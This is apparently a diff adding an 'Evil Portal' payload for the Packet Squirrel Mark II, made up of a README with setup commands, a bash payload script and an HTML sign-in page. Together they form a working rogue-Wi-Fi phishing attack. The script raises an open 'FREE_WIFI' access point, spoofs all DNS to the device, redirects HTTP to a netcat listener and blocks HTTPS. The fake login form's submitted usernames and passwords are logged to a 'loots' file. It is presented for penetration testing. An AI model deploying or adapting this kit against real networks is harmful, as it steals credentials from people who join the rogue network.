Evil Portal with Packet Squirrel Mark II

Implementation of the fake captive portal attack on the **Packet Squirrel Mark II** using a compatible USB Wi-Fi adapter.

payloads/phishing/evil-portal/README.md

@@ -0,0 +1,83 @@
+# Evil Portal with Packet Squirrel Mark II
+
+- Author:        TW-D
+- Version:       1.0
+- Category:      Phishing
+
+## Description
+
+Implementation of the fake captive portal attack on the **Packet Squirrel Mark II** using a compatible USB Wi-Fi adapter.
+
+A evil portal is a technique used to deceive users of a Wi-Fi network by redirecting them to a malicious web page instead of the expected authentication or home page.
+
+### Tested On
+
+| Operating System with/without Web Browser | Notification Type |
+| --- | --- |
+| Ubuntu 24.04 | None |
+| Android 11 | System |
+| Ubuntu 24.04 with Mozilla Firefox | Alert |
+
+## Prerequisites
+
+In **Arming Mode**, make sure both the **Ethernet "Target" Port** and **Ethernet "Network" Port** are connected.
+
+```
+hacker@hacker-computer:~$ ssh root@172.16.32.1
+root@squirrel:~# opkg update
+root@squirrel:~# opkg install usb-modeswitch
+root@squirrel:~# poweroff
+```
+
+Once the **Packet Squirrel** is powered off, connect the **MK7AC WiFi Adapter**.
+
+> [!NOTE]
+> The **Ethernet "Network" Port** will no longer be required.
+
+After startup, it is recommended to back up */etc/config/wireless*, the Wi-Fi configuration file.
+
+```
+hacker@hacker-computer:~$ ssh root@172.16.32.1
+root@squirrel:~# cp /etc/config/wireless /etc/config/wireless.default
+root@squirrel:~# exit
+```
+
+## Configuration
+
+In the file *payload*, modify the values of the following constants.
+
+```bash
+
+######## INITIALIZATION ########
+
+readonly EVIL_SSID="FREE_WIFI"
+
+EVIL_PORTAL="/root/payloads/$(SWITCH)/portals/signin-form.html"
+readonly EVIL_PORTAL
+
+EVIL_LOOT="/root/payloads/$(SWITCH)/loots/signin-form_$(date +%s).log"
+readonly EVIL_LOOT
+
+```
+
+> [!WARNING]
+> The portal page must be a standalone HTML file, without external resources.
+> This was deliberately implemented this way to ensure portability during a physical penetration test.
+
+Then transfer the necessary files and folders into one of the *switchX* directories of the Packet Squirrel.
+
+```
+hacker@hacker-computer:~$ scp -r ./evil-portal/* root@172.16.32.1:/root/payloads/switchX/
+hacker@hacker-computer:~$ ssh root@172.16.32.1
+root@squirrel:~# poweroff
+```
+
+> [!NOTE]
+> The **Ethernet "Target" Port** will no longer be required.
+
+## Usage
+
+Start your **Packet Squirrel Mark II** with the *Mode Switch* set to *switchX*.
+A new open Wi‑Fi network whose name corresponds to the value of the constant *EVIL_SSID* will appear.
+All HTTP requests sent by the client to the minimal web server will be stored in the *loots* directory.
+To properly stop the payload, press the button.

payloads/phishing/evil-portal/payload

@@ -0,0 +1,93 @@
+#!/bin/bash
+#
+# Title:            Evil Portal with Packet Squirrel Mark II
+# Description:
+#                   Implementation of the fake captive portal attack on the
+#                   Packet Squirrel Mark II using a compatible USB Wi-Fi adapter.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Prerequisites:
+# - Packet Squirrel Mark II
+# - MK7AC WiFi Adapter or another compatible adapter
+#
+# Netmode:          NAT
+#
+# STATUS
+# ================
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Waiting for a button press ...................... OFF
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly EVIL_SSID="FREE_WIFI"
+
+EVIL_PORTAL="/root/payloads/$(SWITCH)/portals/signin-form.html"
+readonly EVIL_PORTAL
+
+EVIL_LOOT="/root/payloads/$(SWITCH)/loots/signin-form_$(date +%s).log"
+readonly EVIL_LOOT
+
+######## SETUP ########
+
+set -u
+
+LED SETUP
+
+NETMODE NAT
+
+access_point() {
+    uci set wireless.radio0.channel='11'
+    uci set wireless.radio0.band='2g'
+    uci set wireless.radio0.htmode='HT20'
+    uci set wireless.radio0.disabled="${1}"
+    uci set wireless.default_radio0.ssid="${EVIL_SSID}"
+    uci commit wireless
+    wifi reload
+}
+
+access_point "0"
+
+web_server() {
+    local response_headers
+    response_headers="HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: $(wc -c < "${EVIL_PORTAL}")\r\nConnection: close\r\n\r\n"
+    while true; do
+        {
+            printf '%b' "${response_headers}"
+            cat -- "${EVIL_PORTAL}"
+        } | nc -lnp 8080
+        sleep 1s
+    done
+}
+
+web_server 1> "${EVIL_LOOT}" 2> /dev/null &
+ws_pid="${!}"
+
+LED ATTACK
+
+SPOOFDNS br-lan ".*=172.16.32.1" &> /dev/null &
+sd_pid="${!}"
+
+nft add table ip evil_redirect
+nft add chain ip evil_redirect prerouting "{ type nat hook prerouting priority -100; }"
+nft add rule ip evil_redirect prerouting iif "br-lan" tcp dport 80 dnat to 172.16.32.1:8080
+nft add rule ip evil_redirect prerouting iif "br-lan" tcp dport 443 drop
+
+LED OFF
+
+NO_LED=1 BUTTON
+
+LED CLEANUP
+
+access_point "1"
+kill "${ws_pid}" "${sd_pid}"
+sync
+
+LED FINISH
+
+poweroff

payloads/phishing/evil-portal/portals/signin-form.html

@@ -0,0 +1,77 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <style type="text/css">
+        section {
+            text-align: center;
+        }
+
+        form {
+            border-color: black;
+            border-radius: 10px;
+            border-style: solid;
+            border-width: 1px;
+            margin: 0 20% 0 20%;
+            padding: 2vh 0 0 0;
+        }
+
+        form div {
+            margin-bottom: 2vh;
+        }
+
+        form div input {
+            width: 60%;
+        }
+
+        form button {
+            margin-bottom: 2vh;
+        }
+
+        #authentication-failed {
+            border-color: red;
+            border-radius: 10px;
+            border-style: solid;
+            border-width: 1px;
+            color: red;
+            display: none;
+            margin: 0 auto 2vh auto;
+            padding: 0 1vw 0 1vw;
+            width: max-content;
+        }
+
+        /**
+         * Custom CSS goes here
+         */
+    </style>
+    <title>Evil Portal - Sign In</title>
+</head>
+<body>
+    <main>
+        <section>
+            <h1>Evil Portal</h1>
+            <form action="./?authentication-failed" method="POST">
+                <div>
+                    <input type="text" name="username" minlength="3" placeholder="john.doe" required="true">
+                </div>
+                <div>
+                    <input type="password" name="password" minlength="8" placeholder="********" required="true">
+                </div>
+                <button type="submit">Sign In</button>
+                <span id="authentication-failed">Authentication failed</span>
+            </form>
+        </section>
+    </main>
+    <script type="text/javascript">
+        const CURRENT_URL = new URL(window.location.href);
+        if (CURRENT_URL.search === '?authentication-failed') {
+            document.querySelector('#authentication-failed').style.display = 'block';
+        }
+
+        /**
+         * Custom JavaScript goes here
+         */
+    </script>
+</body>
+</html>